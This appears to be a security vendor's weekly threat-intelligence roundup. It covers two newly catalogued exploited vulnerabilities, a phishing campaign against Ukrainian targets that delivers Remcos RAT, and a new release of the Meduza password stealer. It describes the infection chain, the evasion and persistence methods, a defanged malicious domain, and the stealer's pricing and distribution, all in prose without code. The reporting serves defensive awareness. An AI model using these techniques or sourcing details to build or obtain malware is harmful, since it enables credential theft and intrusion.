CTI Roundup: Remcos RAT Phishing Attacks, New Meduza Stealer Found on Dark Web

In this week’s roundup, CTI investigates the two latest bugs in the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog. Next up, CTI gives an overview of the threat actor UAC-0050 which is now distributing Remcos RAT using phishing tactics. Finally, CTI looks at the latest version of the Meduza password stealer which is now circulating on the dark web.

1. CISA adds two bugs to the Known Exploited Vulnerabilities (KEV) catalog

CISA’s recent additions to the Known Exploited Vulnerabilities (KEV) catalog include a patched flaw in Google Chrome and a bug that affects Spreadsheet::ParseExcel, which is an open-source Perl library.

The agency has set a due date of January 23, 2024 for federal agencies to mitigate the two issues or cease using the vulnerable products.

Bug I: CVE-2023-7024

The first bug is CVE-2023-7024, which is a heap buffer overflow in WebRTC for Google Chrome prior to 120.0.6099.129. This vulnerability could enable a remote attacker to exploit heap corruption via a crafted HTML page. It has a high base score of 8.8 in the National Vulnerability Database.

• Google’s Threat Analysis Group first reported the vulnerability on December 19, 2023. According to their researchers, the vulnerability was exploited in the wild before patches were made available.
• Google has since released a security update that fixes a potential heap buffer overflow in WebRTC. Patched versions were rolled out to Windows users (120.0.6099.129/130) and Mac and Linux users (120.0.6099.129) one day after being reported to Google.
• This vulnerability marked the eighth zero-day vulnerability for Chromium-based web browsers in 2023. Google has not yet provided details about any specific attacks that exploited the vulnerability, noting that bug details may be restricted until more users are patched against the flaw.

Bug II: CVE-2023-7101

The second vulnerability, CVE-2023-7101, is found in Spreadsheet::ParseExcel version .65 which is a Perl module for parsing Excel files.

• Spreadsheet::ParseExcel was found to be at risk from an arbitrary code execution vulnerability as it passed unvalidated input from a file into a string-type “eval.” The issue stemmed from the evaluation of Number format strings within the Excel parsing logic.
• This bug is still awaiting analysis and doesn’t have a vulnerability score yet.
• Barracuda disclosed a slightly different vulnerability on December 24, 2023, tracked as CVE-2023-7102. This zero-day was due to a weakness in the Spreadsheet::ParseExcel third-party library used by the Amavis virus scanner running on Barracuda ESG appliances.
• This flaw could be exploited to execute arbitrary code on unpatched ESG appliances via parameter injection. The company then filed CVE-2023-7101 to track the bug separately in the open-source library.
• Barracuda has attributed the exploitation of CVE-2023-7102 to UNC4841, which has previously been linked to exploitation of other Barracuda zero-days. The actor followed exploitation activity with the deployment of new variants of known implants called SEASPY and SALTWATER – both of which are equipped for persistence and command execution.
• Mandiant has been investigating activity related to the exploitation of these Spreadsheet::ParseExcel vulnerabilities, noting that public and private organizations located across 16 countries are estimated to have been impacted since October 2022.
• Google Cloud has noted that it observed exploitation of CVE-2023-7102 targeting high-tech, information technology providers, and government entities primarily in the U.S. and Asia-Pacific regions no earlier than November 30, 2023.

Analyst comments from Tanium’s Cyber Threat Intelligence team

While CISA’s announcement is important and valuable, it’s important to understand that we should not necessarily wait for vulnerabilities to be added to the KEV to determine if we should patch or not.

As the KEVs name indicates, these vulnerabilities are known to have been exploited in the wild. If you wait, it may already be too late. Just because a vulnerability is not on CISA’s list does not mean it is not being exploited.

Even with that said, patching these newly added vulnerabilities is something that certainly should be done, if not already.

2. UAC-0050 distributes Remcos RAT with new phishing tactics

A threat actor tracked as UAC-0050 is actively deploying phishing attacks to distribute Remcos RAT. The actor has shifted to new strategies to evade detection, including the integration of a pipe method for inter-process communication to create a covert channel for data transfer.

Background on UAC-0050

Uptycs received an alert for a suspicious LNK file on December 21, 2023, that led them to a deeper investigation. Their analysis revealed that UAC-0050 was deploying Remcos RAT in a targeted operation against Ukrainian government entities.

The initial access is believed to be phishing or spam emails that are masked as job propositions, targeting Ukrainian military personnel. The LNK file is responsible for initiating the download of an HTA file which includes a VBS script. This script triggers a PowerShell script that will, in turn, download a malicious payload. Execution of the payload ultimately results in the launching of explorer.exe with Remcos RAT within the memory of explorer.exe.

Technical details

As noted, the attack chain begins with an LNK file. The file in this attack gathered information about what antivirus software is installed on the targeted device. The file also includes an obfuscated URL string, which is executed via MSHTA.

Uptycs was able to obtain the “6.hta” file for additional analysis, leading to the discovery of the contained VBS script. The PowerShell script that is executed via the VBS script has several tasks like initializing a string, creating decryption objects, creating memory streams, and more.

The resulting deobfuscated process led to another PowerShell script that created file paths in the AppData directory, verified the existence of specific files, and invoked the DcO function to carry out various actions.

Uptycs was able to gather all of the PowerShell activities that seemed malicious and ultimately discovered that the payloads (word_update.exe and ofer.docx) were downloaded from the domain new-tech-savvy[.]com.

Payload information

By running the payload “word_update.exe,” researchers found that it will make a copy of itself in a newly created folder, changing the name of the file.

The malware will then establish persistence when it creates an entry in the startup folder via the creation of an LNK file, forcing the malicious copied file to be executed at machine startup. This file had unusual resource data that was transferred to memory and underwent decryption.

The malware then invoked the WriteFile API function and leveraged pipes to bypass various security solutions. The process leverages a handle directed at an unnamed pipe and, after completion, the data is transmitted from word_update.exe to cmd.exe. The data in memory was decrypted during runtime before executing the Remcos RAT.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Using a pipe method to establish a covert channel to transfer data is not an entirely new technique, but it does appear to be new to this threat actor — indicating a shift in the actor’s TTPs and potentially signaling a growing level of sophistication.

What’s interesting is the use of Remcos RAT. The threat actor seems to be increasingly delivering this RAT and was even called out in a warning from CERT-UA last year. While the attack seems to be rather targeted right now, it does make use of TTPs that are commonly used, and therefore is still worth keeping an eye on.

3. New Meduza Stealer version appears on the dark web

Resecurity recently spotted the author of the Meduza password stealer releasing a new version, 2.2, on the dark web. The release was announced on the dark web on December 24, 2023.

The latest version comes just a few months after the stealer’s initial release in June and is already generating significant interest. The biggest improvements seen in version 2.2 are the support of additional software clients, an upgraded credit card grabber, and the addition of advanced mechanisms for password storage dump on different platforms to extract credentials and tokens.

What is Meduza Stealer?

Meduza originally emerged on the XSS underground forum. It later received positive feedback on other communities, like Exploit.

The stealer currently supports Windows Server 2012, 2016, 2019, 2022 and Windows 10/11. Meduza is capable of stealing data from a wide range of software and applications including over 100 browsers, more than 100 cryptocurrency wallets, Telegram IM, Steam, Discord, 27 password managers, Outlook, Google Tokens, and more.

The latest Meduza Stealer updates

The Meduza author is implementing several upgrades for 2024. One key upgrade is the optimization and rewriting of the password grabber from STL to WinAPI. With this comes multiple improvements to the stealer’s C2 communications.

2024 will also bring improved crypting stub and AV evasion, which, for an extra fee, the author can deliver enhanced obfuscation of the stealer with better anti-virus detection coverage. Meduza now also supports new browser-based cryptocurrency wallets.

The author behind Meduza has partnered with a reputable underground crypting service known as TrueCrypt Service. Numerous malware and ransomware operators use this service to obfuscate payloads and evade anti-virus solutions. Resecurity found that the latest result of crypting worked to some degree, with detection by only one vendor on VirusTotal at time of discovery.

How much does Meduza Stealer cost?

Meduza Stealer 2.2 is priced at $199 per month, with a lifetime membership being $1199.

The team also offers crypting services with public and private stub and offers servers to host C2 panels — for a price. Once a threat actor makes a payment for Meduza, the author will invite the actor into a private Telegram channel where they will receive the new tool. According to Resecurity, the latest version available on the private Telegram channel is Meduza 2.2.7, indicating further improvements to the malware.

To install Meduza the threat actor must first launch the shared MedusaServer.exe file, install Python version 3.10.2, install Microsoft Visual Studio Redistributable, and execute several commands in the console. The latest Meduza variant supports communication via Telegram IM as a way of delivering logs from the infected victim.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Meduza’s author is working hard to continually improve the malware and make it more attractive to threat actors. Version 2.2 was published on December 24, and there is now already version 2.2.7 available. This demonstrates how quickly the stealer is evolving.

Given the continued support and growth of Meduza, Resecurity believes that Meduza is beginning to compete with Azorult and Redline Stealer. Only time will tell just how successful the Meduza Stealer will become.

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.